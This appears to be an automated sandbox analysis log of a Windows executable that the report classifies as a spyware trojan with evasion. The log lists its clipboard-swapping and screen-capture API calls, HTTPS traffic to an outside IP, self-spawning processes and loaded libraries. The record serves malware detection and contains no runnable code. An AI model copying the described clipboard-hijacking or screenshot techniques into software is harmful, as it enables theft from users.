                        Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49742 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49750 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.11:49769 version: TLS 1.2
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_00435A30 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,4_2_00435A30
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_03941000 EntryPoint,GetClipboardSequenceNumber,Sleep,Sleep,OpenClipboard,GetClipboardData,GlobalLock,GlobalAlloc,GlobalLock,GlobalUnlock,EmptyClipboard,SetClipboardData,GlobalFree,GlobalUnlock,CloseClipboard,GetClipboardSequenceNumber,4_2_03941000
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_00435A30 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,4_2_00435A30
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_00435BD0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,4_2_00435BD0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 0_2_00CA3CA90_2_00CA3CA9
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 0_2_00CA3CB80_2_00CA3CB8
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 0_2_00CA6CB00_2_00CA6CB0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004178F24_2_004178F2
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004208A04_2_004208A0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004151D04_2_004151D0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_0043A2B04_2_0043A2B0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004413104_2_00441310
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004243A04_2_004243A0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_00441CD04_2_00441CD0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004275204_2_00427520
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004086604_2_00408660
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_00410FB54_2_00410FB5
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004148204_2_00414820
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004038C04_2_004038C0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004398C04_2_004398C0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004330F04_2_004330F0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004400804_2_00440080
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_0042A1424_2_0042A142
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_0041D1504_2_0041D150
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004419604_2_00441960
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004409104_2_00440910
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_0041812C4_2_0041812C
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004059304_2_00405930
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_0040A9E04_2_0040A9E0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004339F04_2_004339F0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004171934_2_00417193
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004289BC4_2_004289BC
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_0043DA404_2_0043DA40
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004092504_2_00409250
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_0041EA604_2_0041EA60
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004042704_2_00404270
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_0040B21B4_2_0040B21B
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004062204_2_00406220
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_00427A304_2_00427A30
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_00440AF04_2_00440AF0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004262F74_2_004262F7
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_00415B544_2_00415B54
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_00419B604_2_00419B60
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_0043EB684_2_0043EB68
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_0041630C4_2_0041630C
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_0042E3154_2_0042E315
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_00439B204_2_00439B20
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_00440BA04_2_00440BA0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_0042E3B24_2_0042E3B2
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_0042FBB04_2_0042FBB0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_00414BBB4_2_00414BBB
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_0041C4604_2_0041C460
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_0041CC704_2_0041CC70
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_00426C744_2_00426C74
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_00404C004_2_00404C00
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_00416C194_2_00416C19
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_0042E41D4_2_0042E41D
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_00432C2F4_2_00432C2F
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004024304_2_00402430
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_0041D4304_2_0041D430
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004074904_2_00407490
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_0041FC904_2_0041FC90
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004314924_2_00431492
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_0043B4A04_2_0043B4A0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_00438CA74_2_00438CA7
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004214B04_2_004214B0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_00425D674_2_00425D67
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_0041AD0C4_2_0041AD0C
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_0041BDC04_2_0041BDC0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_00417DC34_2_00417DC3
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004262F74_2_004262F7
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_0043E59E4_2_0043E59E
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_00418DA04_2_00418DA0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_00437E564_2_00437E56
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_0042966F4_2_0042966F
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_0041A6164_2_0041A616
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_0042A6304_2_0042A630
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004326C04_2_004326C0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004416D04_2_004416D0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004346FA4_2_004346FA
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_00405E804_2_00405E80
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_0040EE854_2_0040EE85
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_0042AE8C4_2_0042AE8C
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004096B04_2_004096B0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004066B04_2_004066B0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_00402EB04_2_00402EB0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_0041C7704_2_0041C770
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_0042F7754_2_0042F775
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_0042C7104_2_0042C710
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_00434F234_2_00434F23
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_0040E7F04_2_0040E7F0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004407FD4_2_004407FD
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_0043AF804_2_0043AF80
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_0043B7894_2_0043B789
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004237A14_2_004237A1
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004167BD4_2_004167BD
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: String function: 00414810 appears 110 times
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: String function: 00408020 appears 36 times
                        Source: C:\Users\user\Desktop\EZsrFTi.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7652 -s 940
                        Source: EZsrFTi.exe, 00000000.00000000.1292078647.0000000000632000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHandler.exe0 vs EZsrFTi.exe
                        Source: EZsrFTi.exe, 00000000.00000002.1489497455.00000000039E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHandler.exe0 vs EZsrFTi.exe
                        Source: EZsrFTi.exe, 00000000.00000002.1488549625.0000000000E7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs EZsrFTi.exe
                        Source: EZsrFTi.exeBinary or memory string: OriginalFilenameHandler.exe0 vs EZsrFTi.exe
                        Source: EZsrFTi.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        Source: EZsrFTi.exeStatic PE information: Section: .idata ZLIB complexity 1.0003366361788617
                        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@8/5@1/1
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_0043A2B0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,4_2_0043A2B0
                        Source: C:\Users\user\Desktop\EZsrFTi.exeMutant created: NULL
                        Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7652
                        Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\1df4e212-fa20-43ac-a1a5-dc15d1d8c784Jump to behavior
                        Source: EZsrFTi.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: EZsrFTi.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                        Source: C:\Users\user\Desktop\EZsrFTi.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: EZsrFTi.exeVirustotal: Detection: 27%
                        Source: C:\Users\user\Desktop\EZsrFTi.exeFile read: C:\Users\user\Desktop\EZsrFTi.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\EZsrFTi.exe "C:\Users\user\Desktop\EZsrFTi.exe"
                        Source: C:\Users\user\Desktop\EZsrFTi.exeProcess created: C:\Users\user\Desktop\EZsrFTi.exe "C:\Users\user\Desktop\EZsrFTi.exe"
                        Source: C:\Users\user\Desktop\EZsrFTi.exeProcess created: C:\Users\user\Desktop\EZsrFTi.exe "C:\Users\user\Desktop\EZsrFTi.exe"
                        Source: C:\Users\user\Desktop\EZsrFTi.exeProcess created: C:\Users\user\Desktop\EZsrFTi.exe "C:\Users\user\Desktop\EZsrFTi.exe"
                        Source: C:\Users\user\Desktop\EZsrFTi.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7652 -s 940
                        Source: C:\Users\user\Desktop\EZsrFTi.exeProcess created: C:\Users\user\Desktop\EZsrFTi.exe "C:\Users\user\Desktop\EZsrFTi.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeProcess created: C:\Users\user\Desktop\EZsrFTi.exe "C:\Users\user\Desktop\EZsrFTi.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeProcess created: C:\Users\user\Desktop\EZsrFTi.exe "C:\Users\user\Desktop\EZsrFTi.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: mscoree.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: EZsrFTi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: EZsrFTi.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: EZsrFTi.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: System.pdb$ source: WERFB06.tmp.dmp.7.dr
                        Source: Binary string: System.Windows.Forms.pdb source: WERFB06.tmp.dmp.7.dr
                        Source: Binary string: mscorlib.pdb source: WERFB06.tmp.dmp.7.dr
                        Source: Binary string: System.ni.pdbRSDS source: WERFB06.tmp.dmp.7.dr
                        Source: Binary string: Handler.pdb@\lqMZ@ source: WERFB06.tmp.dmp.7.dr
                        Source: Binary string: mscorlib.ni.pdb source: WERFB06.tmp.dmp.7.dr
                        Source: Binary string: Handler.pdbx source: EZsrFTi.exe
                        Source: Binary string: Handler.pdb source: EZsrFTi.exe, WERFB06.tmp.dmp.7.dr
                        Source: Binary string: System.Windows.Forms.pdb\ source: WERFB06.tmp.dmp.7.dr
                        Source: Binary string: System.Core.pdb source: WERFB06.tmp.dmp.7.dr
                        Source: Binary string: mscorlib.ni.pdbRSDS source: WERFB06.tmp.dmp.7.dr
                        Source: Binary string: System.ni.pdb source: WERFB06.tmp.dmp.7.dr
                        Source: Binary string: System.pdb source: WERFB06.tmp.dmp.7.dr
                        Source: Binary string: System.Core.ni.pdbRSDS source: WERFB06.tmp.dmp.7.dr
                        Source: Binary string: System.Core.ni.pdb source: WERFB06.tmp.dmp.7.dr
                        Source: EZsrFTi.exeStatic PE information: 0xC6FB477C [Tue Oct 15 09:16:44 2075 UTC]
                        Source: C:\Users\user\Desktop\EZsrFTi.exeCode function: 4_2_004407A0 push eax; mov dword ptr [esp], AEA9A8FBh4_2_004407A1
                        Source: C:\Users\user\Desktop\EZsrFTi.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EZsrFTi.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

